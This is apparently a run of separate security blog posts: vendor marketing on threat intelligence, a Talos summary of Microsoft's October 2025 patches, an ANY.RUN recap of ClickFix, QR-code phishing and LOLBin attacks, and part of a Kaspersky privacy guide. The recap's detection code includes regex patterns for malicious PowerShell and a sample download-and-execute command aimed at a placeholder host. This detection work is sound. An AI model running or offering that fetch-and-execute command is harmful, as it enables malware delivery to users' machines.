  • TI turns security into a cost-saving engine by preventing breaches that could otherwise drain millions in recovery and reputational damage. 
  • Automation eliminates labor waste, allowing SOC teams to focus on high-value tasks instead of drowning in false positives. 
  • TI drives faster response which minimizes disruptions, reducing downtime and the cascading financial losses that follow. 
  • Continuous intelligence future-proofs defenses, keeping organizations ahead of evolving threats without constant manual updates. 
  • Seamless integration protects existing investments, embedding TI into current workflows without costly overhauls. 

3 Hidden Costs of Ignoring Threat Intelligence 

1. SOC Inefficiency and Burnout 

When SOC analysts lack high-fidelity, context-rich threat intelligence, they are forced to manually investigate thousands of alerts, many of which turn out to be false positives. This relentless cycle wastes time, drains budgets, increases turnover, and leaves critical threats unaddressed.  

Without automation and precise data, teams operate in a constant state of reactive chaos, where even minor incidents consume disproportionate resources. 

  • Analyst burnout makes people over two times more likely to look for a new job. 

2. Undetected Threats Escalate into Financial Disasters 

Lack of threat intelligence is just one of the drivers of low detection rates

Cyberattacks exploit gaps in visibility and slow response times. Organizations relying on outdated or generic TI feeds often miss targeted, evasive threats until it is too late. By the time a breach is detected, the damage in terms of downtime, regulatory fines, and lost customer trust has already begun. The financial effects of a single incident can cripple budgets and erode market position for years. 

  • $4.4M is the average breach cost for companies today. 
  • 60% of SMBs close within 6 months of a breach. 

3. Compliance Gaps Trigger Fines and Legal Risks 

Regulatory bodies do not accept “we didn’t see it coming” as an excuse. Without real-time, comprehensive TI, organizations struggle to detect, document, and mitigate threats in ways that satisfy auditors. The result is hefty fines, legal battles, and mandatory security overhauls that could have been avoided with proactive intelligence.

  • HIPAA violations may reach $1.5M+ per incident

5 Ways Threat Intelligence Saves Money and Resources 

1. Helps Stop Breaches Before They Start 

Threat Intelligence Feeds: data source, integration options

The financial impact of a cyberattack extends far beyond the immediate incident. Downtime, regulatory penalties, and reputational harm can accumulate into millions in losses even for a single event. Most organizations do not realize how many attacks slip through their defenses until it’s too late. The difference between a near-miss and a full-blown crisis often comes down to how quickly and accurately threats are identified. 

ANY.RUN’s Threat Intelligence Feeds provide actionable, real-time intelligence needed to block threats at the earliest stage. Instead of reacting to breaches after the fact, teams can neutralize risks before they execute, turning potential disasters into routine intercepts. 

How ANY.RUN Helps

  • TI Feeds and Threat Intelligence Lookup deliver 24× more IOCs per incident from 15,000+ SOCs’ real-world investigations, offering instant, deep context on emerging threats, so analysts confirm and contain attacks in seconds

Reduce MTTR and minimize risks with ANY.RUN’s solutions
Request a quote or trial for your SOC  



Contact us


2. Eliminates Wasteful Spending on False Positives 

SOC teams are overwhelmed by alert fatigue, with analysts spending hours each day chasing down irrelevant or duplicate threats. This becomes both a productivity issue and a financial drain, as organizations pay for overtime, burnout, and unnecessary tooling that does not address real risks. The problem compounds when teams lack the context to prioritize threats effectively, leading to misallocated resources and missed critical alerts. 

ANY.RUN’s solutions filter out the noise, ensuring teams focus only on verified, high-impact threats. This shift saves time and redirects budgets from wasteful investigations to proactive and fast incident handling. 

How ANY.RUN Helps

  • TI Feeds cut through irrelevant alerts, delivering only filtered, malicious IOCs, which saves hours of work and speeds up response.
  • TI Lookup enriches alerts with threat context, including TTPs and additional indicators so teams prioritize based on actual risk

3. Cuts Labor Costs with Automated Triage 

ANY.RUN’s TI solutions can be implemented into existing workflows

Manual threat triage is one of the biggest hidden expenses in cybersecurity. Analysts stuck in repetitive, low-value tasks burn out and cost more in overtime and turnover. Delayed responses increase breach risks and force costly retraining. 

Thanks to plug-and-play integrations and API/SDK support, ANY.RUN’s TI solutions connect seamlessly with SOCs’ current software and enhance existing workflows. This reduces unnecessary escalations from Tier 1 to Tier 2 analysts, cutting labor costs and increasing the alert handling capacity without extra hiring. 

How ANY.RUN Helps

  • TI Lookup can be used to automatically enrich alerts and artifacts, reducing triage time to seconds and giving analysts the context they need to act independently
  • TI Feeds stream live IOCs via STIX/TAXII directly into SIEM/SOAR/firewall/EDR and other solutions, eliminating manual data entry

Introduce TI Feeds into your ecosystem 
Expand threat detection and improve SOC metrics  


Request access to TI Feeds


4. Accelerates Response to Minimize Financial Fallout 

Threat intelligence from ANY.RUN can be traced to sandbox analyses for full attack view 

Every minute counts during a cyber incident. Slow detection and response prolong downtime and amplify financial losses, from regulatory fines to customer churn. Organizations without real-time, context-rich TI often struggle to collect actionable insights, delaying critical decisions and letting attacks spread unchecked. 

ANY.RUN’s TI Lookup provides instant, deep context, including a full attack view based on a single indicator, so teams can quickly understand the threat they are dealing with and respond decisively without guesswork. Faster responses limit damage, preserve revenue, and protect customer trust, turning potential crises into manageable events. 

How ANY.RUN Helps

  • TI Lookup provides sandbox detonation context for threats, so SOCs can see how malware acts on a real system and use the findings to contain it in their infrastructure
  • TI Feeds supply links to sandbox reports for each indicator, which immediately provides security teams with full visibility into the detected threat’s actions. 

Catch attacks early with instant IOC enrichment in TI Lookup
Power your response and proactive defense with data from 15K SOCs 



Request trial for your team


5. Keeps SOCs Up-to-date on Evolving Threats without Manual Work 

TI Lookup provides fresh indicators for the threats active right now  

Cyber threats evolve daily, but most TI feeds update weekly or monthly, leaving gaps that attackers exploit. Organizations stuck with static, generic IOCs are forced into reactive, costly fixes every time a new attack emerges. This approach poses a direct financial risk, increasing the likelihood of malware slipping through outdated defenses. 

ANY.RUN’s TI Feeds update continuously with data from live investigations by 500,000 security analysts, ensuring defenses adapt automatically to new threats. TI Lookup’s MITRE ATT&CK integration helps teams anticipate attacker moves, turning security from a cost center into a strategic advantage. 

How ANY.RUN Helps

  • TI Feeds are continuously updated in real time, delivering 99% unique IOCs, so SOCs can stay ahead of emerging threats and detect attacks that are missed by other tools. 
  • TI Lookup’s Query Updates help SOCs to get new indicators and samples for threats of their interest to keep up with evolving infrastructure and enrich proactive defense

Success Story: International Transport Company 

Challenge 

A transportation company faced constant cyber threats, especially through email phishing and malware attacks. Attackers frequently changed their infrastructure, making it hard to track and block threats in time. The security team struggled to manually monitor evolving attacks, which risked exposing sensitive communications and disrupting operations. 

Solution 

The company used ANY.RUN’s Threat Intelligence Lookup to automate threat tracking. They set up custom search queries for specific threats like geo-targeted attacks, CVEs, and phishing domains and subscribed to real-time updates. This allowed them to focus on active threats, convert new threat data into detection rules, and respond faster without manual searches. 

Results 

  • Faster Threat Detection: Automated alerts helped the team spot and block attacks like phishing and malware campaigns before they caused damage. 
  • Better Resource Use: The team saved time by reducing manual research, letting them focus on high-priority threats and improve overall security. 
  • Proactive Defense: Real-time updates on active threats allowed the company to strengthen defenses and stay ahead of attackers. 

Conclusion

Threat intelligence solutions like ANY.RUN’s TI Feeds and TI Lookup both improve security and deliver measurable cost savings, resource optimization, and risk reduction. By automating triage, eliminating false positives, and accelerating response, businesses can: 

  • Avoid breach-related costs (downtime, fines, reputation damage). 
  • Cut labor expenses (overtime, hiring, turnover). 
  • Optimize security budgets (focus on high-impact threats). 
  • Future-proof defenses (adapt to evolving attacks). 

About ANY.RUN   

ANY.RUN is built to help security teams detect threats faster and respond with greater confidence. Our Interactive Sandbox delivers real-time malware analysis and threat intelligence, giving analysts the clarity they need when it matters most.    

With support for Windows, Linux, and Android environments, our cloud-based sandbox enables deep behavioral analysis without the need for complex setup. Paired with Threat Intelligence Lookup and TI Feeds, ANY.RUN provides rich context, actionable IOCs, and automation-ready outputs, all with zero infrastructure burden.   

Start your 14-day trial now →   

The post 5 Ways Threat Intelligence Saves Businesses Money and Resources  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Microsoft Patch Tuesday for October 2025 — Snort rules and prominent vulnerabilities


Microsoft has released its monthly security update for October 2025, addressing 175 Microsoft CVEs and 21 non-Microsoft CVEs. Among these, 17 vulnerabilities are considered critical and 11 are flagged as important and considered more likely to be exploited. Current intelligence shows that three of the important vulnerabilities have already been detected in the wild.

In the following notes we provide a concise overview of the most significant issues, focusing on the vulnerabilities that could impact the widest user base or carry the highest severity.

Exploited in the Wild

Three vulnerabilities were confirmed to have been exploited in the wild.

CVE‑2025‑24990: Windows Agere Modem Driver Elevation of Privilege Vulnerability
Microsoft identified a flaw in the third‑party Agere Modem driver that ships with supported Windows operating systems. The driver was permanently removed in the October cumulative update. Users who rely on fax modem hardware that depends on this driver should uninstall any remaining components, as the affected driver is no longer supported.

CVE‑2025‑59230: Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
An improper access‑control check in Windows Remote Access Connection Manager allows an authorized attacker to gain elevated local privileges when accessing the service.

CVE‑2025‑47827: Secure Boot Bypass in IGEL OS before 11
This vulnerability permits a crafted root file-system to bypass Secure Boot on IGEL OS versions before 11 due to incorrect cryptographic signature verification performed by the igel-flash-driver module.

Critical Vulnerabilities

Microsoft marked 17 vulnerabilities as critical in this release. While these have not been observed exploited in the wild, their severity warrants prompt remediation.

CVE‑2025‑59287 Windows Server Update Service (WSUS) Remote Code Execution Vulnerability – Deserialization of untrusted data in WSUS allows an attacker to remotely execute code, potentially compromising the update service on vulnerable servers.

CVE‑2025‑59246, CVE‑2025‑59218  Azure Entra ID Elevation of Privilege Vulnerabilities – An attacker could exploit Azure Entra ID to elevate privileges, affecting the identity platform’s access control.

CVE‑2025‑0033 RMP Corruption During SNP Initialization – A race condition during Reverse Map Table initialization in AMD EPYC SEV‑SNP processors can allow a hypervisor with privileged control to modify RMP entries before they are locked. Azure Confidential Computing products contain multiple safeguards to prevent host compromise.

CVE‑2025‑59234 Microsoft Office Remote Code Execution Vulnerability – A use‑after‑free bug in Microsoft Office enables an attacker to execute code locally on an affected system, contingent on the presence of vulnerable content.

CVE‑2025‑49708 Microsoft Graphics Component Elevation of Privilege Vulnerability – An unauthenticated network attacker can manipulate the Graphics component through use‑after‑free logic to elevate privileges on a target machine.

CVE‑2025‑59291 Confidential Azure Container Instances Elevation of Privilege Vulnerability – External control of file names or paths in Confidential Azure Container Instances allows a privileged attacker to elevate privileges locally within the container environment.

CVE‑2025‑59292 Azure Compute Gallery Elevation of Privilege Vulnerability – Misuse of file names or paths can enable a privileged attacker to gain elevated rights in an Azure Compute Gallery context.

CVE‑2025‑59227 Microsoft Office Remote Code Execution Vulnerability – Exploitation of this vulnerability would allow remote execution on Office applications across multiple Windows versions.

CVE‑2025‑59247 Azure PlayFab Elevation of Privilege Vulnerability – PlayFab services can be manipulated by an unauthorized actor to elevate privileges, impacting the underlying Azure infrastructure.

CVE‑2025‑59252, CVE‑2025‑59272, CVE‑2025‑59286 Copilot Spoofing Vulnerabilities – Improper sanitization and encoding of user‑supplied data in Microsoft 365 Copilot leads to spoofing attacks.

CVE‑2025‑59271 Redis Enterprise Elevation of Privilege Vulnerability – Redis Enterprise servers may allow privileged escalation through a configuration oversight, impacting managed Azure Redis services.

CVE‑2025‑55321 Azure Monitor Log Analytics Spoofing Vulnerability – Cross‑site scripting (XSS) in Azure Monitor allows a network attacker to perform spoofing attacks within the Log Analytics portal.

CVE‑2025‑59236 Microsoft Excel Remote Code Execution Vulnerability – An unauthorized attacker could trigger a use‑after‑free in Microsoft Excel, causing local code execution on the target system.

CVE‑2016‑9535 LibTIFF Heap Buffer Overflow – The libtiff library contains a heap‑buffer‑overflow that can be triggered by malformed TIFF files, potentially allowing an attacker to execute arbitrary code under the user context.

Talos would also like to highlight 11 important vulnerabilities that were considered more likely to be exploited: CVE‑2025‑48004, CVE‑2025‑24052, CVE‑2025‑55676, CVE‑2025‑55681, CVE‑2025‑58722, CVE‑2025‑59199, CVE‑2025‑55680, CVE‑2025‑55692, CVE‑2025‑55693, CVE‑2025‑55694 and CVE‑2025‑59194. They range from remote code execution to privilege escalation across both desktop and cloud environments.

Security teams are encouraged to examine the detailed advisory documents for each CVE to understand the exact scope and mitigations. A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort ruleset that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Ruleset customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort 2 rules included in this release that protect against the exploitation of many of these vulnerabilities are:  65391 – 65410, 64420 – 65422.

The following Snort 3 rules are also available: 301325 – 301334.

Cisco Talos Blog – ​Read More

New Malware Tactics: Cases & Detection Tips for SOCs and MSSPs

Recently, we have hosted a webinar exploring some of the latest malware and phishing techniques to show how interactive analysis and fresh threat intelligence can help SOC teams stay ahead.

ANY.RUN’s experts depicted the evolving landscape of malware tactics, highlighted real-world examples of sophisticated attacks, and provided practical detection tips for analysts.  
 
You can watch the session on ANY.RUN’s YouTube channel or read our quick recap below.  

Join us on social media so you don’t miss new event announcements: LinkedIn, X.com, Discord.  

Key Takeaways 

  1. QR Code Threats are Evolving: Phishkit attacks increasingly use QR codes to evade detection, as many security solutions still cannot adequately scan and analyze QR code content. 
  2. Interactive Analysis is Critical: Traditional automated tools fail against sophisticated attacks like ClickFix that require human interaction to fully execute. SOC teams need sandbox environments capable of manual navigation through CAPTCHAs and multi-stage social engineering attacks. 
  3. System Binaries are Attack Vectors: Living Off the Land Binary (LOLBin) abuse allows attackers to hide malicious activities within trusted system processes like PowerShell and mshta.exe, making detection extremely challenging without advanced behavioral analysis. 
  4. Real-Time Threat Intelligence is Essential: Access to current, actionable intelligence from global SOC investigations can reduce mean time to response by up to 21 minutes per case and provide crucial context for suspicious activities. 
  5. Automation Reduces Analyst Burden: Strategic automation can decrease Tier 1 case loads by up to 20% and reduce escalations to senior analysts by 30%, allowing teams to focus on high-value threat hunting and response activities. 

The Growing Challenge: New Techniques, Low Detection Rates 

Low detection rates remain a critical issue for SOC teams. As attackers employ new evasion techniques, missed threats can lead to severe infrastructure damage, asset compromise, and reputational harm.  

Why detection rates can be disappointing 

The webinar covered three key tactics: ClickFix attacks using steganography payloads, phishing kits with Tycoon2FA‘s new evasion chain, and Living Off the Land Binaries (LOLBins) in DeerStealer attacks. 

Establishing Fast Detection and Proactive Defense with ANY.RUN 

Interactive Sandbox streamlines detection of malware and phishing with live analysis 

Attackers are relentless in refining their malware and phishing tactics, but SOC teams can fight back effectively with the right solutions. By combining hands-on interactive analysis, automation, and shared threat intelligence, ANY.RUN helps SOCs cut through alert noise, accelerate detection, and strengthen proactive defense. 

Organizations implementing advanced detection strategies should track several key metrics to measure success: 

  • Detection Rate Improvement: 88% of threats become visible within 60 seconds of analysis. 
  • Mean Time to Response Reduction: Advanced detection reduces MTTR by up to 21 minutes per case. 
  • Escalation Reduction: Effective training and services can reduce escalations from Tier 1 to Tier 2 analysts by 30%. 
  • Overall Performance Multiplier: Some organizations report up to 3x better performance. 

Reduce MTTR and minimize risks with ANY.RUN’s solutions
Request a quote or trial for your SOC  





Three Critical Attack Vectors Demanding Attention 

1. ClickFix Attacks: The Steganography Challenge 

Key TTPs of ClickFix attacks 

ClickFix represents one of the most insidious social engineering attacks currently targeting organizations. This technique leverages fake error messages and CAPTCHA challenges to trick users into manually executing malicious PowerShell commands through clipboard hijacking. 

The attack typically begins with phishing emails or compromised websites that present users with seemingly legitimate verification processes. The sophisticated nature of these attacks lies in their multi-layered deception: 

  • Double Spoofing: Attackers create fake versions of trusted websites (such as booking platforms) and combine them with convincing CAPTCHA challenges. 
  • Manual Execution Requirement: The attack only proceeds when users manually follow instructions, making it extremely difficult for automated systems to detect. 
  • Clipboard Manipulation: Malicious commands are silently copied to the user’s clipboard without notification. 
  • Social Engineering: Users are instructed to paste and execute clipboard contents through system dialog boxes. 

We can see these TTPs in action by analyzing a ClickFix sample in the Sandbox.  

A user is required to click through a (fake) CAPTCHA — this is where most automated tools stumble and miss the threat, but ANY.RUN’s Sandbox interactivity allows the analyst to complete the step.  

Forged Booking.com page with a fake CAPTCHA 

When the CAPTCHA is clicked, a malicious command is copied to the user’s clipboard without any notification. It is a PowerShell script:  

Malicious command captured by the Sandbox

  

A popup appears next, directing the user to run the command.  

Sandbox running the PowerShell command for a user 

The process tree in the Sandbox allows us to view the entire event chain from the initial command execution to the final payload. 
 
Once executed, ClickFix attacks can deploy various malware types, including Lumma Stealer, AsyncRAT, and ransomware. The technique’s effectiveness stems from its ability to bypass traditional detection mechanisms that cannot simulate human interaction or navigate through interactive elements like CAPTCHAs. 

Detect threats faster with ANY.RUN’s Interactive Sandbox
See full attack chain in seconds for immediate response 





In our case, the attack delivered not only AsyncRAT but also DCRAT. The Sandbox tells us that it has created files in the startup directory, a standard persistence mechanism that allows the malware to keep running even after a system reboot. 


DCRAT deployment in the process tree 

Detection of ClickFix attacks requires interactive analysis capabilities that can replicate human behavior in a controlled environment. Traditional automated scanning tools will typically fail at the CAPTCHA stage, leaving the threat undetected and potentially allowing it to reach end users. 
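As a complement to interactive detonation, some teams also score the pasted command itself at the endpoint. Below is a minimal, hypothetical heuristic in Python; the indicator list, weights, and threshold are illustrative assumptions rather than ANY.RUN functionality, and a real deployment would run it over process-creation telemetry from an EDR. 

```python
import re

# Hypothetical indicators of ClickFix-style PowerShell one-liners
# (hidden window, encoded payloads, in-memory download-and-execute).
INDICATORS = [
    (r"-w(indowstyle)?\s+hidden", 2),                   # hidden console window
    (r"-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}", 3),   # base64-encoded command
    (r"\b(iwr|invoke-webrequest|curl)\b", 2),           # remote download
    (r"\|\s*iex\b|invoke-expression", 3),               # execute downloaded content in memory
    (r"mshta(\.exe)?\s+https?://", 3),                  # mshta pulling a remote HTA
]

def clickfix_score(command_line: str) -> int:
    """Return a rough suspicion score for a command line."""
    cmd = command_line.lower()
    return sum(weight for pattern, weight in INDICATORS if re.search(pattern, cmd))

if __name__ == "__main__":
    sample = 'powershell -w hidden -c "iwr https://example[.]test/x.ps1 | iex"'
    print(clickfix_score(sample))  # anything above ~4 would warrant escalation (assumed threshold)
```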

To see variants of ClickFix attacks with varying scenarios and payloads and gather IOCs for detection rules, query the technique in ANY.RUN’s Threat Intelligence Lookup. The data comes from sandbox analyses by over 15,000 SOC teams around the world investigating recent real-world incidents.    

threatName:”ClickFix” 

ClickFix sandbox analyses found via TI Lookup 

2. PhishKit Attacks: Advanced Evasion Through QR Code Obfuscation 

Why phishkits are dangerous 

Phishkit attacks represent a significant evolution in phishing campaign sophistication. These pre-packaged toolkits, often sold on dark web marketplaces, enable even unskilled attackers to create highly convincing phishing campaigns that mimic trusted brands like Microsoft, Google, and other major service providers. 

The latest iterations of phishkit attacks incorporate several advanced evasion techniques:  

  • QR Code Integration: Malicious links are embedded within QR codes in PDF attachments, often styled to appear as legitimate DocuSign documents. 
  • Mobile Device Targeting: QR codes naturally direct victims to mobile devices, where phishing indicators may be less visible on smaller screens. 
  • Multi-Stage Human Interaction Checks: Attacks include various verification steps designed to evade automated analysis. 
  • AI-Generated Content: Some variants use artificial intelligence to create more convincing phishing content. 

Despite these evasion techniques, ANY.RUN’s Sandbox can automatically detonate such attacks. Automated Interactivity handles this without manual effort from analysts: view an analysis.  

Phishing email with a malicious attachment: the Sandbox clicks the links

In the Actions section, we can see the steps the Sandbox performed to detonate each attack stage. The attack begins with an email carrying a PDF attachment styled to look like a legitimate DocuSign document.   
 
The document contains a QR code: a common trick in today’s phishing attacks that can be very effective. First, it lets attackers avoid detection, because many security solutions still cannot scan QR codes. Second, most people scan codes with mobile devices, so the attack unfolds further on a smaller screen, making it harder to spot signs of phishing.   
 
The Sandbox extracts the link from the QR code, follows it to a page with a Cloudflare Turnstile CAPTCHA, and solves the CAPTCHA. The final stage of the kill chain is a very convincing fake Microsoft 365 login page designed to steal credentials.  
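Outside the Sandbox, the QR extraction step can be approximated with open-source tooling. A minimal sketch, assuming the pdf2image and pyzbar libraries (which require the poppler and zbar system packages) and a placeholder file name: 

```python
from pdf2image import convert_from_path   # requires the poppler utilities on the system
from pyzbar.pyzbar import decode          # requires the zbar shared library

def extract_qr_urls(pdf_path: str) -> list[str]:
    """Render each PDF page to an image and decode any QR codes found."""
    urls = []
    for page in convert_from_path(pdf_path, dpi=300):
        for symbol in decode(page):
            data = symbol.data.decode("utf-8", errors="replace")
            if data.lower().startswith(("http://", "https://")):
                urls.append(data)
    return urls

if __name__ == "__main__":
    # "invoice.pdf" is a placeholder for the suspicious attachment
    for url in extract_qr_urls("invoice.pdf"):
        print("QR code points to:", url)
```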

Popular phishkits like Tycoon2FA and Mamba2FA have been linked to sophisticated threat groups, including Storm-1747, demonstrating the organized nature of these campaigns. The QR code obfuscation technique is particularly effective because many security solutions still cannot adequately scan and analyze QR codes for malicious content. 

To find more samples of phishkit attacks employing QR codes and targeting companies in your location, use the following TI Lookup request (replace Spain’s country code with your own): 

threatName:”qrcode” and threatName:”phishing” AND submissionCountry:”es” 

Phishing campaigns targeting Spanish users and containing a QR code 

Effective detection requires systems capable of: 

  • Automatically extracting and analyzing URLs from QR codes. 
  • Solving various CAPTCHA challenges without human intervention. 
  • Following multi-stage attack chains to their ultimate payload. 
  • Identifying sophisticated phishing page designs that closely mimic legitimate services. 

ANY.RUN’s customers report that the autonomous interactive analysis in the Sandbox brings the total case load for L1s down by up to 20%.   

3. Living Off the Land Binaries (LOLBins): Exploiting System Trust  

LOLBin attacks: key tactics 

The abuse of Living Off the Land Binaries represents one of the most challenging detection scenarios for SOC teams. This technique involves hijacking legitimate Windows system utilities such as PowerShell, mshta.exe, and cmd.exe to execute malicious activities while blending with normal system processes. LOLBin abuse is particularly effective due to: 

  • Legitimate Process Masquerading: Malicious activities appear to originate from trusted system binaries. 
  • Antivirus Evasion: Many security solutions whitelist system utilities, allowing malicious commands to execute undetected. 
  • Environmental Consistency: Attacks use tools that exist in every Windows environment, ensuring compatibility. 
  • Reduced Forensic Footprint: Activities may be harder to distinguish from legitimate administrative tasks. 

Let’s observe an example of a typical LOLBin attack. 

LOLBin phishing attack with a fake .lnk 

It might begin with a malicious .lnk file that executes mshta.exe through PowerShell to download executable files from remote servers. The attack chain often includes decoy actions (such as downloading legitimate PDF files) to distract from the real malicious payload delivery.  

ANY.RUN’s script tracer shows a .pdf and a malware file being downloaded 

We can see how the malware first downloads a .pdf file as a way to distract analysts; a moment later, it downloads and executes the final payload. 

A stealer is delivered at the final stage of the kill chain 

In this attack, the payload is DeerStealer, which can steal sensitive information and establish persistent access to compromised systems. The challenge for SOC teams lies in distinguishing between legitimate system administration activities and malicious abuse of the same tools. 
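A common starting point for triage is a simple parent-child heuristic over process-creation events: document handlers and shells spawning script hosts such as mshta.exe or powershell.exe deserve a closer look. The pairs and field names below are illustrative assumptions, not a complete ruleset: 

```python
# Hypothetical suspicious parent -> child pairs seen in LOLBin abuse.
SUSPICIOUS_PAIRS = {
    ("winword.exe", "powershell.exe"),
    ("winword.exe", "mshta.exe"),
    ("outlook.exe", "powershell.exe"),
    ("explorer.exe", "mshta.exe"),      # e.g. a .lnk launched from the desktop
    ("powershell.exe", "mshta.exe"),
    ("mshta.exe", "powershell.exe"),
}

def flag_lolbin_chains(events: list[dict]) -> list[dict]:
    """Return process-creation events whose (parent, child) pair looks suspicious.

    Each event is expected to carry 'parent_image' and 'image' fields
    (field names are assumptions; adapt to your telemetry schema).
    """
    flagged = []
    for event in events:
        parent = event.get("parent_image", "").lower().rsplit("\\", 1)[-1]
        child = event.get("image", "").lower().rsplit("\\", 1)[-1]
        if (parent, child) in SUSPICIOUS_PAIRS:
            flagged.append(event)
    return flagged

if __name__ == "__main__":
    sample = [{"parent_image": r"C:\Windows\explorer.exe",
               "image": r"C:\Windows\System32\mshta.exe"}]
    print(flag_lolbin_chains(sample))
```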
 
The biggest problem with LOLBin abuse is that it’s hard to spot once the infection takes place. In the example above, the script connects to an external server to download the payload, and this activity would be spotted by detection systems.   

But an analyst might dismiss it as a false positive because there’s no context for what happened after the connection. For context that links indicators to real incidents and enables fast, low-false-positive threat detection, SOC teams can leverage ANY.RUN’s Threat Intelligence Feeds.  

Threat Intelligence Feeds: data source, integration options

TI Feeds deliver a continuous stream of actionable network IOCs straight to SIEM, XDR, or SOAR systems, helping SOC teams detect and block threats as soon as they emerge in malware samples. Just like TI Lookup, TI Feeds derive data from the latest sandbox investigations of 15,000 SOC teams around the world.   

This approach provides malicious IPs, domains, and URLs that have been active for no more than a few hours, so they can be used to detect attacks that are happening right now. All IOCs are linked to sandbox analysis sessions with full telemetry and behavior data.  
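As a rough sketch of how such a feed can be wired into a blocklist, the snippet below assumes the indicators arrive as a STIX 2.1 bundle, a common delivery format for IOC feeds; the URL and parsing details are placeholders rather than ANY.RUN’s actual API: 

```python
import json
import re
import urllib.request

FEED_URL = "https://example.invalid/ti-feed.stix.json"  # placeholder, not a real endpoint

def fetch_bundle(url: str) -> dict:
    """Download a STIX 2.1 bundle (JSON) from the feed URL."""
    with urllib.request.urlopen(url, timeout=30) as resp:
        return json.load(resp)

def extract_network_iocs(bundle: dict) -> set[str]:
    """Pull IPs, domains and URLs out of indicator patterns such as
    [ipv4-addr:value = '203.0.113.7'] or [url:value = 'http://bad.example/'].
    """
    values = set()
    for obj in bundle.get("objects", []):
        if obj.get("type") != "indicator":
            continue
        for match in re.findall(r"(?:ipv4-addr|domain-name|url):value\s*=\s*'([^']+)'",
                                obj.get("pattern", "")):
            values.add(match)
    return values

if __name__ == "__main__":
    iocs = extract_network_iocs(fetch_bundle(FEED_URL))
    # Write one IOC per line so a firewall, proxy, or SIEM watchlist can pick it up.
    with open("blocklist.txt", "w", encoding="utf-8") as fh:
        fh.write("\n".join(sorted(iocs)))
```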

Conclusion 

ClickFix attacks, advanced PhishKits, and LOLBin abuse represent just a few examples of the challenges facing modern SOC teams. 

Success in this environment requires a comprehensive approach that combines interactive analysis capabilities, current threat intelligence, and strategic automation. Organizations that invest in these capabilities see measurable improvements in detection rates, response times, and overall security posture. 

About ANY.RUN  

ANY.RUN supports over 15,000 organizations across industries such as banking, manufacturing, telecommunications, healthcare, retail, and technology, helping them build stronger and more resilient cybersecurity operations.   
 
With our cloud-based Interactive Sandbox, security teams can safely analyze and understand threats targeting Windows, Linux, and Android environments in less than 40 seconds and without the need for complex on-premise systems. Combined with TI Lookup, YARA Search, and TI Feeds, we equip businesses to speed up investigations, reduce security risks, and improve teams’ efficiency. 

The post New Malware Tactics: Cases & Detection Tips for SOCs and MSSPs appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Your anti-OSINT guide: hunting down and deleting everything about you on the internet that you can possibly reach | Kaspersky official blog

It’s frankly concerning just how much online services — and people we’ve never met — know about us. In fact, most of this data lands online because of us: the average internet user has dozens of accounts — if not hundreds.

That’s why doing a vanity search on yourself is so useful and eye-opening. Think about it: your digital footprint has been building up for years. Social media, message boards, old marketplace listings — everything you’ve ever typed is just sitting there, waiting to go off like a ticking time bomb.

Carelessly posted photos, videos, or even old comments have been known to go viral years later, causing serious retroactive problems for the poster. You might be thinking, “Who’d even care about me?” Well, trust us, plenty of folks would. This ranges from angry exes, advertisers, and scammers, all the way to potential employers and government agencies. HR departments routinely deep-dive into candidates’ histories before hiring. Furthermore, data found by using shadowy services that search for information leaked in data breaches is frequently used for doxing and harassment.

So, if you don’t manage it, your digital footprint can unexpectedly come back to bite you. Sure, it’s impossible to erase it completely, but you can certainly try to minimize the amount of information available to everyone. Today, we talk about how to scrub your digital footprint without sliding into full-blown paranoia. (Actually, we’ve got a few extra tips tucked away for the truly paranoid among you too!)

Start by googling yourself regularly

First things first: enter your first name and surname, email address, and main usernames into a search engine and see what pops up. Beyond doing manual searches, there are several useful tools that can help you find your account details across dozens, if not hundreds, of services and sites — most of which you’ve probably forgotten about. Some examples:

  • Namechk is a service designed to check the availability of usernames across more than 90 social networks.
  • Web Cleaner lets you search for yourself across dozens of search engines without having to manually enter the query into each one. What doesn’t show up in Google might easily be discovered on Bing, Yahoo, and others.

Why egosurf? By searching for yourself, you’ll first see exactly where you once registered (and perhaps forgot about), and second, you’ll be able to check for any fake or impersonating accounts using your name. If you do find an imposter account, contact the website’s support team and demand they remove the fake profiles. Be prepared to verify your identity to the support agent, but remain vigilant: there’s a risk of phishing scams that exploit the KYC (Know Your Customer) verification process.

Get rid of old accounts and posts

Once you’ve dealt with the fake accounts and compiled a list of your genuine ones, it’s time to delete the superfluous and outdated ones. The fewer dead accounts online holding your personal data, the better. Don’t rely entirely on the initial search or your own memory. Dig deep into your email archives to see which sites and services message you as their user. You can also review the list of saved passwords in your browsers or password managers.

I once discovered an account I made — on a gun forum, of all things — which I’d used only once to message another member. While those specific details might not have made me easier to hack, an attacker could easily have extracted the password from that old, likely vulnerable message board platform. If I had reused that password elsewhere, I’d be in trouble. This is exactly why you should set up a unique password for every new account and store it securely in a reliable app.

To quickly tackle old accounts, check out the open-source service Just Delete Me. It even has browser extensions for Chrome and Firefox. This tool shows how easy or difficult it is to delete your information on specific websites, helping you decide if the effort is worth the reward.

Dealing with shadow profiles

Unfortunately, the accounts you’ve registered are only half the battle. Sometimes social media sites generate shadow profiles containing data on you that may persist even after you delete your account. These profiles can include information you never directly shared with the service. For example, you might have granted the Facebook app access to your phone contacts without ever importing them into your account. All the data from your address book could end up in that shadow profile.

Even more unsettling, sometimes these accounts get created for users who’ve never even registered with the service, by gathering data from other platforms and open sources. While it’s nearly impossible to completely prevent shadow profiles from being created, you can definitely minimize the damage. Go through your old apps, and revoke their access to your sensitive data — things like your camera, photos, contacts, location, and so on. Going forward, meticulously monitor which permissions you grant to each new app.

If you discover that your Google, Apple or social media accounts are still linked to a third-party service you haven’t used in ages, go ahead and unlink them. These old connections always increase your risk of a data breach or leak.

Invoke your right to be forgotten

If your searches turn up links to compromising or false information about you, you can utilize your right to be forgotten. This right was established in Europe in 2014 and later reinforced by the GDPR; similar concepts exist in other countries.

Submit a request using the dedicated forms provided by search engines. Google, Bing, and others have these available online. Some search engines lack a transparent mechanism for removing personal data, so for those, you can try reaching out through their customer support chat.

